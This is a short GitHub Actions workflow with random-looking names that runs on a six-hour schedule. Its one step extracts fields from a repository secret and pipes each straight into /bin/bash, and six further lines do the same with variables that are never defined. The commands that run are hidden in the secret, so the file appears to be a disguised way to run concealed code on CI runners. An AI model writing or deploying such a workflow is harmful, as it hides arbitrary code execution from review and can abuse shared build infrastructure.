name: gunnageterracotta
on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gunnageterracotta
        env:
          uejrq9564: ${{ secrets.uejrq9564 }}
        run: |
          echo $uejrq9564 | jq -r .ivw903 | /bin/bash
          echo $qouz02 | jq -r .xlz607 | /bin/bash
          echo $fcpi4 | jq -r .pwglk02 | /bin/bash
          echo $pv9196 | jq -r .ozndr26 | /bin/bash
          echo $hgwk17 | jq -r .jvwaf2 | /bin/bash
          echo $gsbj52755 | jq -r .kaf32266 | /bin/bash
          echo $ke7 | jq -r .i98218 | /bin/bash

